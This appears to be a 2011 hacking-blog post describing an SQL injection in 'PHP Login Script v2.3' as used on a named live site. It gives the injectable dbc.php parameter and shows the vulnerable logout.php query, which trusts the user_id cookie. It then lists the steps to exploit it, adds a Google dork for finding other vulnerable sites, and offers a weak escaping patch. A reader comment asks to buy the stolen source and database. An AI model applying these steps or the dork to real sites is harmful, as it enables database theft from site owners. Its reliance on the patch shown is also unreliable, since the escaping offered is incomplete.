myavscan.net source code with SQLDB
I write about this shit on my twitter, bu rewrite also here.
Some scammerz sell this shit on some IT Sec/Hacking Resource.
Proof ::
How 2 hack ::Vuln in dbc.php here :Code:http://myavscan.net/dbc.php?user_id=[SQLi]logout.php file content:Code:if(isset($_SESSION['user_id']) || isset($_COOKIE['user_id'])) { mysql_query("update `users` set `ckey`= '', `ctime`= '' where `id`='$_SESSION[user_id]' OR `id` = '$_COOKIE[user_id]'") or die(mysql_error()); }need set cookie here : dbc.php?user_id='[SQL] and go http://myavscan.net/logout.php....Code:<?php include 'dbc.php'; logout(); ?>
if u have PHP Login Script v 2.3 on u'r CMS, u must patch file dbc.php with next code :// google_dork: intext:"Powered by PHP Login Script"Code:$cookieUserID = mysql_escape_string($_COOKIE['user_id']); if(isset($_SESSION['user_id']) || isset($cookieUserID)) { mysql_query("update `users` set `ckey`= '', `ctime`= '' where `id`='$_SESSION[user_id]' OR `id` = '$cookieUserID'") or die(mysql_error()); }
©2011, copyright BLACK BURN
sa serais bien que tu mme tous sa en rar sa serias plus facile tu aurais plus de monde voila
ReplyDeleteHey u wanna sell source and sql db to me email me with subject scan site source to balloontwisters@gmail.com just throw a price at me
ReplyDelete